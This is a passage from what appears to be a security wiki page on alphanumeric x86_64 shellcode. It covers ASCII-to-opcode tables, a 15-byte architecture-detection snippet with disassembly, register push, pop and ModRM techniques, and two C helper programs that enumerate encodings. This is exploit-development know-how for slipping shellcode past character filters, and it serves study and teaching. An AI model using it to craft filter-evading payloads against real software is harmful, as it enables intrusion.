| xor (%{64bit}), %{8bit}<br />
|-<br />
! scope="row" | 3<br />
| 0x33<br />
| xor (%{64bit}), %{32bit}<br />
|-<br />
! scope="row" | 4<br />
| 0x34<br />
| xor [byte], %al<br />
|-<br />
! scope="row" | 5<br />
| 0x35<br />
| xor [dword], %eax<br />
|-<br />
! scope="row" | 6<br />
| 0x36<br />
| %ss segment register<br />
|-<br />
! scope="row" | 7<br />
| 0x37<br />
| Bad Instruction!<br />
|-<br />
! scope="row" | 8<br />
| 0x38<br />
| cmp %{8bit}, (%{64bit})<br />
|-<br />
! scope="row" | 9<br />
| 0x39<br />
| cmp %{32bit}, (%{64bit})<br />
|-<br />
|}<br />
{| class="wikitable" style="text-align:center; width:60%;"<br />
|-<br />
|+ Uppercase<br />
|-<br />
! scope="col" | ASCII<br />
! scope="col" | Hex<br />
! scope="col" | Assembler Instruction<br />
|-<br />
<br />
! scope="row" | A<br />
| 0x41<br />
| 64 bit reserved prefix<br />
|-<br />
! scope="row" | B<br />
| 0x42<br />
| 64 bit reserved prefix<br />
|-<br />
! scope="row" | C<br />
| 0x43<br />
| 64 bit reserved prefix<br />
|-<br />
! scope="row" | D<br />
| 0x44<br />
| 64 bit reserved prefix<br />
|-<br />
! scope="row" | E<br />
| 0x45<br />
| 64 bit reserved prefix<br />
|-<br />
! scope="row" | F<br />
| 0x46<br />
| 64 bit reserved prefix<br />
|-<br />
! scope="row" | G<br />
| 0x47<br />
| 64 bit reserved prefix<br />
|-<br />
! scope="row" | H<br />
| 0x48<br />
| 64 bit reserved prefix<br />
|-<br />
! scope="row" | I<br />
| 0x49<br />
| 64 bit reserved prefix<br />
|-<br />
! scope="row" | J<br />
| 0x4a<br />
|64 bit reserved prefix<br />
|-<br />
! scope="row" | K<br />
| 0x4b<br />
|64 bit reserved prefix<br />
|-<br />
! scope="row" | L<br />
| 0x4c<br />
| 64 bit reserved prefix<br />
|-<br />
! scope="row" | M<br />
| 0x4d<br />
|64 bit reserved prefix<br />
|-<br />
! scope="row" | N<br />
| 0x4e<br />
|64 bit reserved prefix<br />
|-<br />
! scope="row" | O<br />
| 0x4f<br />
|64 bit reserved prefix<br />
|-<br />
! scope="row" | P<br />
| 0x50<br />
|push %rax<br />
|-<br />
! scope="row" | Q<br />
| 0x51<br />
|push %rcx<br />
|-<br />
! scope="row" | R<br />
| 0x52<br />
|push %rdx<br />
|-<br />
! scope="row" | S<br />
| 0x53<br />
|push %rbx<br />
|-<br />
! scope="row" | T<br />
| 0x54<br />
|push %rsp<br />
|-<br />
! scope="row" | U<br />
| 0x55<br />
|push %rbp<br />
|-<br />
! scope="row" | V<br />
| 0x56<br />
|push %rsi<br />
|-<br />
! scope="row" | W<br />
| 0x57<br />
|push %rdi<br />
|-<br />
! scope="row" | X<br />
| 0x58<br />
|pop %rax<br />
|-<br />
! scope="row" | Y<br />
| 0x59<br />
|pop %rcx<br />
|-<br />
! scope="row" | Z<br />
| 0x5a<br />
|pop %rdx<br />
|-<br />
|}<br />
<br />
<br />
{| class="wikitable" style="text-align:center; width:60%;"<br />
|-<br />
|+ Lowercase<br />
|-<br />
! scope="col" | ASCII<br />
! scope="col" | Hex<br />
! scope="col" | Assembler Instruction<br />
|-<br />
<br />
! scope="row" | a<br />
| 0x61<br />
|Bad Instruction!<br />
|-<br />
! scope="row" | b<br />
| 0x62<br />
|Bad Instruction!<br />
|-<br />
! scope="row" | c <br />
| 0x63<br />
|movslq (%{64bit}), %{32bit}<br />
|-<br />
! scope="row" | d<br />
| 0x64<br />
|%fs segment register<br />
|-<br />
! scope="row" | e<br />
| 0x65<br />
| %gs segment register<br />
|-<br />
! scope="row" | f<br />
| 0x66<br />
| 16 bit operand override<br />
|-<br />
! scope="row" | g<br />
| 0x67<br />
| 32 bit address-size override (16 bit in 32-bit mode)<br />
|-<br />
! scope="row" | h<br />
| 0x68<br />
|push [dword]<br />
|-<br />
! scope="row" | i<br />
| 0x69<br />
|imul [dword], (%{64bit}), %{32bit}<br />
|-<br />
! scope="row" | j<br />
| 0x6a<br />
|push [byte]<br />
|-<br />
! scope="row" | k<br />
| 0x6b<br />
|imul [byte], (%{64bit}), %{32bit}<br />
|-<br />
! scope="row" | l<br />
| 0x6c<br />
|insb (%dx),%es:(%rdi)<br />
|-<br />
! scope="row" | m<br />
| 0x6d<br />
|insl (%dx),%es:(%rdi)<br />
|-<br />
! scope="row" | n<br />
| 0x6e<br />
|outsb %ds:(%rsi),(%dx)<br />
|-<br />
! scope="row" | o<br />
| 0x6f<br />
|outsl %ds:(%rsi),(%dx)<br />
|-<br />
! scope="row" | p<br />
| 0x70<br />
| jo [byte]<br />
|-<br />
! scope="row" | q<br />
| 0x71<br />
| jno [byte]<br />
|-<br />
! scope="row" | r<br />
| 0x72<br />
| jb [byte]<br />
|-<br />
! scope="row" | s<br />
| 0x73<br />
| jae [byte]<br />
|-<br />
! scope="row" | t<br />
| 0x74<br />
| je [byte]<br />
|-<br />
! scope="row" | u<br />
| 0x75<br />
| jne [byte]<br />
|-<br />
! scope="row" | v<br />
| 0x76<br />
| jbe [byte]<br />
|-<br />
! scope="row" | w<br />
| 0x77<br />
| ja [byte]<br />
|-<br />
! scope="row" | x<br />
| 0x78<br />
| js [byte]<br />
|-<br />
! scope="row" | y<br />
| 0x79<br />
| jns [byte]<br />
|-<br />
! scope="row" | z<br />
| 0x7a<br />
| jp [byte]<br />
|-<br />
|}<br />
<br />
= Alphanumeric opcode compatibility =<br />
Intercompatible opcodes are important to note due to the fact that many opcodes overlap and thus, writing [[shellcode]] that will run on both 32 bit and 64 bit x86 platforms becomes possible. <br />
<br />
== Alphanumeric inter-compatible x86 opcodes ==<br />
This chart was derived by cross referencing [[#Available_Instructions|available 64 bit instructions]] with [[Ascii_shellcode#Available_Instructions|available 32 bit instructions]].<br />
{| class="wikitable" style="text-align:center; width:60%;"<br />
|+ Intercompatible x86* Alphanumeric Opcodes<br />
|-<br />
! scope="col" | Hex<br />
! scope="col" | ASCII<br />
! scope="col" | Assembler Instruction<br />
|-<br />
! scope="row" | 0x64, 0x65<br />
| d,e<br />
|[fs &#x7c; gs] prefix<br />
|-<br />
! scope="row" | 0x66, 0x67<br />
| f,g<br />
| 16bit operand override; address-size override (16bit in 32-bit mode, 32bit in 64-bit mode)<br />
|-<br />
! scope="row" | 0x68, 0x6a<br />
| h,j<br />
| push<br />
|-<br />
! scope="row" | 0x69, 0x6b<br />
| i,k<br />
| imul<br />
|-<br />
! scope="row" | 0x6c-0x6f<br />
| l-o<br />
| ins[bwd], outs[bwd]<br />
|-<br />
! scope="row" | 0x70-0x7a<br />
| p-z<br />
| Conditional Jumps<br />
|-<br />
! scope="row" | 0x30-0x35<br />
| 0-5<br />
| xor<br />
|-<br />
! scope="row" | 0x36<br />
| 6<br />
| %ss segment register<br />
|-<br />
! scope="row" | 0x38-0x39<br />
| 8,9<br />
| cmp<br />
|-<br />
! scope="row" | 0x50-0x57<br />
| P-W<br />
| push *x, *i, *p<br />
|-<br />
! scope="row" | 0x58-0x5a<br />
| XYZ<br />
| pop [*ax, *cx, *dx]<br />
|-<br />
|}<br />
<br />
Because not ''all'' opcodes are intercompatible, yet comparisons and conditional jumps ''are'', it is possible to determine the architecture of an x86 processor using exclusively alphanumeric opcodes. The opcodes which are specifically not compatible are the 64 bit REX prefixes '''0x40-0x4f''' (of which 0x41-0x4f are alphanumeric), which select a 64 bit operand size and the 8 additional general purpose registers '''%r8-%r15'''; on a 32 bit processor these same bytes are single-byte '''inc''' and '''dec''' instructions. By making use of these additional registers (which 32 bit processors do not have), one can perform an operation that sets a value on a different register on the two processors. A comparison against one of the two registers then reveals whether the value was set. Given the instruction limitations, '''pop''' is the most effective way to set a register, and using a register other than %rsp or %esp as a second stack pointer allows a comparison between a register and the value most recently pushed to or popped from the stack.<br />
<br />
==15 byte architecture detection shellcode==<br />
{{info|This bytecode does not have a conditional jump. The reader may add this for customization based on the size and architecture of the payload that occurs after this snippet.}}<br />
This simple alphanumeric bytecode is 15 bytes long, ending in a comparison which returns '''equal''' on a 32 bit system and '''not equal''' on a 64 bit system. The conditional jump may be best reserved for the '''t''' and '''u''' instructions, '''jump if equal''' and '''jump if not equal''', respectively.<br />
<br />
* Assembled:<br />
'''TX4HPZTAZAYVH92'''<br />
<br />
* Disassembly:<br />
[root@ares bha]# objdump -d xarch32.o<br />
<br />
xarch32.o: file format elf32-i386<br />
<br />
Disassembly of section .text:<br />
00000000 <_start>:<br />
0: 54 push %esp<br />
1: 58 pop %eax<br />
2: 34 48 xor $0x48,%al<br />
4: 50 push %eax<br />
5: 5a pop %edx<br />
6: 54 push %esp<br />
7: 41 inc %ecx<br />
8: 5a pop %edx<br />
9: 41 inc %ecx<br />
a: 59 pop %ecx<br />
b: 56 push %esi<br />
c: 48 dec %eax<br />
d: 39 32 cmp %esi,(%edx)<br />
[root@ares bha]# # Returns not-equal on a 64 bit system:<br />
[root@ares bha]# objdump -d xarch64.o<br />
<br />
xarch64.o: file format elf64-x86-64<br />
<br />
<br />
Disassembly of section .text:<br />
<br />
0000000000000000 <_start>:<br />
0: 54 push %rsp<br />
1: 58 pop %rax<br />
2: 34 48 xor $0x48,%al<br />
4: 50 push %rax<br />
5: 5a pop %rdx<br />
6: 54 push %rsp<br />
7: 41 5a pop %r10<br />
9: 41 59 pop %r9<br />
b: 56 push %rsi<br />
c: 48 39 32 cmp %rsi,(%rdx)<br />
<br />
On a 64-bit system, this will not cause a segfault because (%rdx) points to somewhere inside the stack. Also notice that while this was assembled as a [[Linux]]-based ELF executable, the [[Operating System]] should not matter, as this stays within the confines of legal instructions for any x86 CPU that should not cause an access violation.<br />
<br />
{{programming}}{{exploitation}}{{social}}<br />
<br />
=Alphanumeric x86_64 register value and data manipulation=<br />
<br />
Given the limited set of instructions for alphanumeric shellcode, it is important to note the different methods of manipulating registers within the confines of that instruction set. Identifying these leads to '''mov emulations''', which make up most of the actual code.<br />
<br />
==Push: alphanumeric x86_64 registers==<br />
<br />
Alphanumeric data can be pushed in one-byte, two-byte, and four-byte quantities at once.<br />
<br />
<br />
{|border="1" cellpadding="5" cellspacing="0" align="center"<br />
|+'''One-byte, two-byte, and four-byte quantities'''<br />
|-<br />
! scope="col" | Assembly<br />
! scope="col" | Hexadecimal<br />
! scope="col" | Alphanumeric ASCII<br />
|-<br />
| pushw [word]<br />
| \x66\x68\x##\x##<br />
| fh??<br />
|-<br />
| pushq [byte]<br />
| \x6a\x##<br />
| j?<br />
|-<br />
| pushq [dword]<br />
| \x68\x##\x##\x##\x##<br />
| h????<br />
|}<br />
<br />
<br />
Pushing the 64 bit registers RAX-RDI is done using a single upper case P-W (\x50-\x57) depending on which register is being pushed. Prefixing with "A" (REX.B, for the extended registers R8-R15) or "f" (16 bit operand size, for AX-DI) gives access to 32 pushable registers using alphanumeric shellcode.<br />
<br />
<br />
{|border="1" cellpadding="5" cellspacing="0" align="center"<br />
|+'''Push: X86_64 Registers RAX-RDI'''<br />
|-<br />
! scope="col" | Assembly<br />
! scope="col" | Hexadecimal<br />
! scope="col" | Alphanumeric ASCII<br />
|-<br />
| push %rax <br />
| \x50<br />
| P<br />
|-<br />
| push %rcx<br />
| \x51<br />
| Q<br />
|-<br />
| push %rdx<br />
| \x52<br />
| R<br />
|-<br />
| push %rbx<br />
| \x53<br />
| S<br />
|-<br />
| push %rsp <br />
| \x54<br />
| T<br />
|-<br />
| push %rbp<br />
| \x55<br />
| U<br />
|-<br />
| push %rsi<br />
| \x56<br />
| V<br />
|-<br />
| push %rdi<br />
| \x57<br />
| W<br />
|}<br />
<br />
<br />
For the extended registers R8-R15, "A" is prefixed to the corresponding RAX-RDI register push.<br />
<br />
<br />
{|border="1" cellpadding="5" cellspacing="0" align="center"<br />
|+'''Push: X86_64 Extended Registers R8-R15'''<br />
|-<br />
! scope="col" | Assembly<br />
! scope="col" | Hexadecimal<br />
! scope="col" | Alphanumeric ASCII<br />
|-<br />
| push %r8<br />
| \x41\x50<br />
| AP<br />
|-<br />
| push %r9<br />
| \x41\x51<br />
| AQ<br />
|-<br />
| push %r10<br />
| \x41\x52<br />
| AR<br />
|-<br />
| push %r11<br />
| \x41\x53<br />
| AS<br />
|-<br />
| push %r12<br />
| \x41\x54<br />
| AT<br />
|-<br />
| push %r13<br />
| \x41\x55<br />
| AU<br />
|-<br />
| push %r14<br />
| \x41\x56<br />
| AV<br />
|-<br />
| push %r15<br />
| \x41\x57<br />
| AW<br />
|}<br />
<br />
<br />
For the 16 bit registers AX-DI "f" is prefixed to the corresponding RAX-RDI register push.<br />
<br />
<br />
{|border="1" cellpadding="5" cellspacing="0" align="center"<br />
|+'''Push: X86_64 16 bit Registers'''<br />
|-<br />
! scope="col" | Assembly<br />
! scope="col" | Hexadecimal<br />
! scope="col" | Alphanumeric ASCII<br />
|-<br />
| push %ax<br />
| \x66\x50<br />
| fP<br />
|-<br />
| push %cx<br />
| \x66\x51<br />
| fQ<br />
|-<br />
| push %dx<br />
| \x66\x52<br />
| fR<br />
|-<br />
| push %bx<br />
| \x66\x53<br />
| fS<br />
|-<br />
| push %sp<br />
| \x66\x54<br />
| fT<br />
|-<br />
| push %bp<br />
| \x66\x55<br />
| fU<br />
|-<br />
| push %si<br />
| \x66\x56<br />
| fV<br />
|-<br />
| push %di<br />
| \x66\x57<br />
| fW<br />
|}<br />
<br />
<br />
For the 16 bit extended registers R8W-R15W, "f" is prefixed to the corresponding R8-R15 register push.<br />
<br />
<br />
{|border="1" cellpadding="5" cellspacing="0" align="center"<br />
|+'''Push: X86_64 16 bit Extended Registers'''<br />
|-<br />
! scope="col" | Assembly<br />
! scope="col" | Hexadecimal<br />
! scope="col" | Alphanumeric ASCII<br />
|-<br />
| push %r8w<br />
| \x66\x41\x50<br />
| fAP<br />
|-<br />
| push %r9w<br />
| \x66\x41\x51<br />
| fAQ<br />
|-<br />
| push %r10w<br />
| \x66\x41\x52<br />
| fAR<br />
|-<br />
| push %r11w<br />
| \x66\x41\x53<br />
| fAS<br />
|-<br />
| push %r12w<br />
| \x66\x41\x54<br />
| fAT<br />
|-<br />
| push %r13w<br />
| \x66\x41\x55<br />
| fAU<br />
|-<br />
| push %r14w<br />
| \x66\x41\x56<br />
| fAV<br />
|-<br />
| push %r15w<br />
| \x66\x41\x57<br />
| fAW<br />
|}<br />
<br />
==Pop: alphanumeric x86_64 registers==<br />
<br />
Pop is more limited in its range of usable registers due to the limitations of alphanumeric shellcode: only %rax, %rcx and %rdx have alphanumeric pop opcodes (0x58-0x5a, 'X'-'Z'). As with push, the prefixed forms reach the 16 bit and extended registers, giving a total of 12 registers that can be popped (6 full size and 6 16 bit).<br />
<br />
{|border="1" cellpadding="5" cellspacing="0" align="center"<br />
|+'''Pop: X86_64 Registers RAX-RDX'''<br />
|-<br />
! scope="col" | Assembly<br />
! scope="col" | Hexadecimal<br />
! scope="col" | Alphanumeric ASCII<br />
|-<br />
| pop %rax <br />
| \x58<br />
| X<br />
|-<br />
| pop %rcx<br />
| \x59<br />
| Y<br />
|-<br />
| pop %rdx<br />
| \x5a<br />
| Z<br />
|}<br />
<br />
<br />
For the extended registers, the RAX-RDX pops are prefixed with "A" for the corresponding R8-R10 pop.<br />
<br />
<br />
{|border="1" cellpadding="5" cellspacing="0" align="center"<br />
|+'''Pop: X86_64 Extended Registers R8-R10'''<br />
|-<br />
! scope="col" | Assembly<br />
! scope="col" | Hexadecimal<br />
! scope="col" | Alphanumeric ASCII<br />
|-<br />
| pop %r8 <br />
| \x41\x58<br />
| AX<br />
|-<br />
| pop %r9<br />
| \x41\x59<br />
| AY<br />
|-<br />
| pop %r10<br />
| \x41\x5a<br />
| AZ<br />
|}<br />
<br />
<br />
16 bit registers (0x66, 'f' prefix; 'fA' for the extended registers):<br />
<br />
{| border="1" cellpadding="5" cellspacing="0" align="center"<br />
! Assembly<br />
! Hexadecimal<br />
! Alphanumeric ASCII <br />
|-<br />
| pop %ax<br />
| \x66\x58<br />
| fX<br />
|-<br />
| pop %cx<br />
| \x66\x59<br />
| fY<br />
|-<br />
| pop %dx<br />
| \x66\x5a<br />
| fZ<br />
|-<br />
| pop %r8w<br />
| \x66\x41\x58<br />
| fAX<br />
|-<br />
| pop %r9w<br />
| \x66\x41\x59<br />
| fAY<br />
|-<br />
| pop %r10w<br />
| \x66\x41\x5a<br />
| fAZ<br />
|}<br />
<br />
Using push and pop the values of 6 full size CPU registers can be set:<br />
<br />
*%rax<br />
*%rcx<br />
*%rdx<br />
*%r8<br />
*%r9<br />
*%r10<br />
<br />
Or get the value of any of the 16 full size CPU registers onto the top of the stack:<br />
<br />
*%r8-%r15<br />
*%rax-%rdi<br />
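The push and pop tables above follow directly from the opcode layout: the register number sits in the low three bits of the opcode, REX.B (0x41) adds the fourth bit, and 0x66 selects a 16 bit operand. The following C program is an added example and is not code from the original page; it encodes push and pop for all 16 registers at both widths, rejects any encoding that contains a non-alphanumeric byte, and so regenerates the counts the text gives (32 pushable, 12 poppable). The register numbering is the hardware one (0=rax ... 7=rdi, 8-15=r8-r15).<br />

```c
/*
 * Added example, not code from the original page: encode push/pop of any of
 * the 16 x86_64 general-purpose registers (64-bit or 16-bit width) and report
 * whether the encoding survives an alphanumeric filter.  Register numbers:
 * 0=rax 1=rcx 2=rdx 3=rbx 4=rsp 5=rbp 6=rsi 7=rdi, 8-15=r8-r15.
 * push r64 is 0x50+reg, pop r64 is 0x58+reg; r8-r15 need the REX.B prefix
 * 0x41 ('A') and a 16-bit operand needs 0x66 ('f'), which precedes REX.
 */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

static int is_alnum_byte(uint8_t c)
{
    return (c >= '0' && c <= '9') || (c >= 'A' && c <= 'Z') ||
           (c >= 'a' && c <= 'z');
}

/* Fills out[] (up to 3 bytes); returns the length, or 0 if any byte of the
 * encoding would fail an alphanumeric filter (e.g. pop %rbx = 0x5b = '['). */
static size_t encode_stack_op(uint8_t base, int reg, int wide16, uint8_t out[3])
{
    size_t n = 0;
    if (reg < 0 || reg > 15)
        return 0;
    if (wide16)
        out[n++] = 0x66;                        /* operand-size prefix 'f' */
    if (reg >= 8)
        out[n++] = 0x41;                        /* REX.B selects r8-r15 'A' */
    out[n++] = (uint8_t)(base + (reg & 7));     /* opcode carries low 3 bits */
    for (size_t i = 0; i < n; i++)
        if (!is_alnum_byte(out[i]))
            return 0;
    return n;
}

size_t alnum_push(int reg, int wide16, uint8_t out[3]) { return encode_stack_op(0x50, reg, wide16, out); }
size_t alnum_pop(int reg, int wide16, uint8_t out[3])  { return encode_stack_op(0x58, reg, wide16, out); }

/* 1 if the encoding is exactly the string expect, e.g. pop_is(10, 0, "AZ"). */
int push_is(int reg, int wide16, const char *expect)
{
    uint8_t buf[3];
    size_t n = alnum_push(reg, wide16, buf);
    return n != 0 && n == strlen(expect) && memcmp(buf, expect, n) == 0;
}
int pop_is(int reg, int wide16, const char *expect)
{
    uint8_t buf[3];
    size_t n = alnum_pop(reg, wide16, buf);
    return n != 0 && n == strlen(expect) && memcmp(buf, expect, n) == 0;
}

/* How many (register, width) combinations can be pushed or popped at all. */
int count_pushable(void)
{
    int c = 0;
    uint8_t buf[3];
    for (int w = 0; w < 2; w++)
        for (int r = 0; r < 16; r++)
            c += alnum_push(r, w, buf) != 0;
    return c;
}
int count_poppable(void)
{
    int c = 0;
    uint8_t buf[3];
    for (int w = 0; w < 2; w++)
        for (int r = 0; r < 16; r++)
            c += alnum_pop(r, w, buf) != 0;
    return c;
}

int main(void)
{
    static const char *names[16] = { "rax", "rcx", "rdx", "rbx", "rsp", "rbp", "rsi", "rdi",
                                     "r8", "r9", "r10", "r11", "r12", "r13", "r14", "r15" };
    uint8_t buf[3];
    for (int r = 0; r < 16; r++) {
        size_t np = alnum_push(r, 0, buf);
        printf("push %%%-3s %.*s", names[r], (int)np, (const char *)buf);
        size_t nq = alnum_pop(r, 0, buf);
        if (nq)
            printf("   pop %%%-3s %.*s\n", names[r], (int)nq, (const char *)buf);
        else
            printf("   pop %%%-3s (not alphanumeric)\n", names[r]);
    }
    printf("pushable: %d, poppable: %d\n", count_pushable(), count_poppable());
    return 0;
}
```

Running it lists every register with its alphanumeric encoding, and prints "(not alphanumeric)" for the pops of %rbx, %rsp, %rbp, %rsi, %rdi and %r11-%r15, whose opcodes 0x5b-0x5f fall on '[', '\', ']', '^' and '_'.<br />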
<br />
== Prefixes ==<br />
<br />
Examining this next section, there are 5 legacy registers and 5 extended 64 bit registers that can be push(ed) but not pop(ed), because the pop opcodes 0x5b-0x5f ('[' through '_') are not alphanumeric:<br />
<br />
*%rbx<br />
*%rsp<br />
*%rbp<br />
*%rsi<br />
*%rdi<br />
*%r11-%r15<br />
<br />
Their values can only be set through the 6 fully controllable registers (%rax, %rcx, %rdx, %r8, %r9, %r10), by emulating mov with push and pop or through the memory-operand instructions below. The rest of this section uses only registers already under control to find instruction forms that set the remaining ones.<br />
<br />
The special register prefix has been identified:<br />
<br />
0x41, 'A'<br />
<br />
The word operand override has been identified, <br />
<br />
0x66, 'f'.<br />
<br />
Note the identification of all the alphanumeric overrides and prefixes. These overrides are very similar to those for 32 bit platforms.<br />
<br />
{| class="wikitable"<br />
! Hex Value<br />
! Alpha Value<br />
! Description<br />
|-<br />
| 0x36<br />
| 6<br />
| %ss segment override<br />
|-<br />
| 0x64<br />
| d<br />
| %fs segment override<br />
|-<br />
| 0x65<br />
| e<br />
| %gs segment override<br />
|-<br />
| 0x66<br />
| f<br />
| 16-bit operand size<br />
|-<br />
| 0x67<br />
| g<br />
| 32-bit address size (in 64-bit mode)<br />
|-<br />
| 0x41<br />
| A<br />
| 64-bit special register use (%r##)<br />
|-<br />
| 0x48<br />
| H<br />
| 64-bit register size override<br />
|-<br />
| 0x41-0x4f<br />
| A-O<br />
| REX prefixes: 64-bit operand size (0x48, 'H') and selection of %r8-%r15<br />
|}<br />
<br />
== Operands ==<br />
<br />
Opcodes used for popping a register can also be used as 'register operands' (ModRM bytes) for more advanced instructions. For example, take this xor instruction:<br />
{| class="wikitable"<br />
! Assembly<br />
! Hexadecimal<br />
! Alpha<br />
|-<br />
| <syntaxhighlight lang="asm">xor 0x[byte](%rax),%ebx</syntaxhighlight><br />
| \x33\x58\x##<br />
| 3X?<br />
|}<br />
<br />
The %rax register can be changed to %rcx or %rdx using the 0x59 (Y) and 0x5a (Z) opcodes in place of the 0x58 (X) opcode:<br />
<br />
{| class="wikitable"<br />
! Assembly<br />
! Hexadecimal<br />
! Alpha<br />
|-<br />
| <syntaxhighlight lang="asm">xor 0x[byte](%rcx),%ebx</syntaxhighlight><br />
| \x33\x59\x##<br />
| 3Y?<br />
|}<br />
<br />
Whenever there's a controllable register, the notation {reg} is used to recognize it as an option. In the bytecodes and string examples, a '?' is used in the bytecode itself and a '*' to denote the register operand, for example:<br />
<br />
{| class="wikitable"<br />
! Assembly<br />
! Hexadecimal<br />
! Alpha<br />
|-<br />
|<syntaxhighlight lang="asm">xor 0x[byte]({reg}),%ebx</syntaxhighlight><br />
| \x33\x??\x##<br />
| 3*?<br />
|}<br />
<br />
The opcodes for '''%rax''', '''%rcx''', and '''%rdx''' are important and thus will be used frequently. When encountering multiple operands, the operand number is used in the notation for readability purposes.<br />
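Which register operands are reachable is decided entirely by the ModRM byte that follows the opcode. The following C program is an added example and is not code from the original page; it decodes the mod, reg and rm fields, and enumerates which combinations are alphanumeric. It shows why 'X', 'Y' and 'Z' (0x58-0x5a) select %rax, %rcx and %rdx with a disp8 as the memory operand and %ebx as the register operand, and why no register-to-register form is ever available: every alphanumeric ModRM byte has mod 00 or 01, so the second operand is always memory. The sample bytes are taken from the page's own shellcode ('k9A', 'Hcq0', '3X?', 'Hc49').<br />

```c
/*
 * Added example, not code from the original page: decode the ModRM byte that
 * follows opcodes such as 0x33 (xor), 0x63 (movslq) and 0x6b (imul), and
 * enumerate which operand combinations are reachable when that ModRM byte
 * must itself be alphanumeric.  ModRM = mod:2 | reg:3 | rm:3.  mod=00 is
 * (rm) with no displacement, mod=01 is disp8(rm), mod=10 is disp32(rm) and
 * mod=11 is a register-direct operand; rm=100 means a SIB byte follows and
 * mod=00/rm=101 is RIP-relative in 64-bit mode.
 */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

static int is_alnum_byte(uint8_t c)
{
    return (c >= '0' && c <= '9') || (c >= 'A' && c <= 'Z') ||
           (c >= 'a' && c <= 'z');
}

struct modrm { unsigned mod, reg, rm; };

struct modrm modrm_decode(uint8_t b)
{
    struct modrm m = { b >> 6, (b >> 3) & 7, b & 7 };
    return m;
}

uint8_t modrm_encode(unsigned mod, unsigned reg, unsigned rm)
{
    return (uint8_t)(((mod & 3) << 6) | ((reg & 7) << 3) | (rm & 7));
}

/* Bitmask (bit i set = rm value i usable) of rm encodings that give an
 * alphanumeric ModRM byte for this mod/reg pair.  Register-direct (mod=3)
 * is never alphanumeric: 0xc0-0xff lies far above 'z' (0x7a). */
unsigned alnum_rm_mask(unsigned mod, unsigned reg)
{
    unsigned mask = 0;
    for (unsigned rm = 0; rm < 8; rm++)
        if (is_alnum_byte(modrm_encode(mod, reg, rm)))
            mask |= 1u << rm;
    return mask;
}

/* Bitmask of reg-field values that occur in at least one alphanumeric ModRM
 * byte; all eight are reachable, but only with a memory operand. */
unsigned reachable_reg_fields(void)
{
    unsigned mask = 0;
    for (int b = 0; b < 256; b++)
        if (is_alnum_byte((uint8_t)b))
            mask |= 1u << modrm_decode((uint8_t)b).reg;
    return mask;
}

int main(void)
{
    static const char *r64[8] = { "rax", "rcx", "rdx", "rbx", "rsp", "rbp", "rsi", "rdi" };
    static const char *r32[8] = { "eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi" };
    /* ModRM bytes from the page's shellcode: '9' (imul), 'q' (movslq), 'X' (xor), '4' (SIB form). */
    const uint8_t samples[] = { 0x39, 0x71, 0x58, 0x34 };
    for (size_t i = 0; i < sizeof samples; i++) {
        struct modrm m = modrm_decode(samples[i]);
        printf("ModRM 0x%02x '%c': mod=%u reg=%%%s rm=", samples[i], samples[i], m.mod, r32[m.reg]);
        if (m.rm == 4)
            printf("SIB byte follows\n");
        else
            printf("%s(%%%s)\n", m.mod == 1 ? "disp8" : m.mod == 2 ? "disp32" : "", r64[m.rm]);
    }
    printf("reg fields reachable: 0x%02x\n", reachable_reg_fields());
    printf("rm choices for disp8(...),%%ebx: 0x%02x; register-direct xor: 0x%02x\n",
           alnum_rm_mask(1, 3), alnum_rm_mask(3, 0));
    return 0;
}
```

The 0x39 sample decodes to mod=0, reg=%edi, rm=(%rcx), which is exactly the page's imul $0x41,(%rcx),%edi, and 0x71 to disp8(%rcx),%esi, the page's movslq 0x30(%rcx),%rsi. The mask for mod=1, reg=%ebx comes out as 0x07, i.e. only %rax, %rcx and %rdx as the base register, which is the '3X?', '3Y?', '3Z?' family from the text.<br />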
<br />
== The rbx, rsp, and rbp registers ==<br />
Identifying ways to set the remaining registers while investigating %rbx was not entirely fruitful. There is no alphanumeric '''pop %rbx''', so full control over %rbx through the stack is not available; however, its sub-registers can be written through memory-operand instructions:<br />
* %ebx<br />
* %bx<br />
* %bh<br />
* %bl<br />
<br />
Upon further investigation, this opened up access to multiple additional registers using:<br />
*xor<br />
*imul<br />
*movslq<br />
<br />
{| class="wikitable"<br />
! Assembly<br />
! Hexadecimal<br />
! Alpha<br />
|-<br />
| <syntaxhighlight lang="asm">xor 0x[byte]({reg64}),{reg32}</syntaxhighlight><br />
| \x33\x??\x#1<br />
| 3*1<br />
|-<br />
| <source lang="asm">imul $0x[dword1],0x[byte2]({reg64}),{reg32}</source><br />
| \x69\x??\x#2\x#1\x#1\x#1\x#1<br />
| i*21111<br />
|-<br />
| <source lang="asm">imul $0x[byte1],0x[byte2]({reg64}), {reg32}</source><br />
| \x6b\x??\x#2\x#1<br />
| k*21<br />
|-<br />
| <source lang="asm">movslq 0x[byte1]({reg64}), {reg32}</source><br />
| \x63\x??\x#1<br />
| c*1<br />
|}<br />
<br />
To use the %ss segment, insert the prefix at the beginning of the instruction's bytecode (e.g. "63*?" instead of "3*?"). To use the extended 64 bit registers, 0x41 ("A") is placed at the beginning of the bytecode. If both are required the %ss prefix must come first, e.g. '6A3*?', because legacy prefixes precede the REX prefix. The 64 bit operand-size REX prefix (0x48, "H") turns the 32 bit register operand of any of these instructions into its 64 bit counterpart:<br />
<br />
{| class="wikitable"<br />
! Assembly<br />
! Hexadecimal<br />
! Alpha<br />
|-<br />
| <source lang="asm">imul $0x[byte1],0x[byte2]({reg64}),{reg64}</source><br />
| \x48\x6b\x??\x#2\x#1<br />
| Hk*21<br />
|}<br />
<br />
To set the value of %rbx directly, imul, xor, and movslq can be used. It's similar for other registers:<br />
* %rbp<br />
* %rsp<br />
<br />
==Xor==<br />
That leaves %rsp, %rbp, %rdi, and %rsi. A closer look at xor, whose opcodes run from 0x30 to 0x35, shows these valuable forms:<br />
<br />
{| class="wikitable"<br />
! Hexadecimal<br />
! Assembly<br />
|-<br />
| 0x34<br />
| <syntaxhighlight lang="asm">xor $0x##, %al</syntaxhighlight><br />
|-<br />
| 0x35<br />
| <syntaxhighlight lang="asm">xor $0x########, %eax</syntaxhighlight><br />
|-<br />
| 0x48 0x35<br />
| <syntaxhighlight lang="asm">xor $0x########, %rax</syntaxhighlight><br />
|}<br />
<br />
'''0x30''' is a multi-byte xor instruction: it always needs at least one further byte to denote its two operands, even when only registers are involved:<br />
<br />
{| class="wikitable"<br />
! Hexadecimal<br />
! Assembly<br />
|-<br />
| 0x30<br />
| <syntaxhighlight lang="asm">xor %{16bit}, (%{64bit})</syntaxhighlight><br />
|-<br />
| <br />
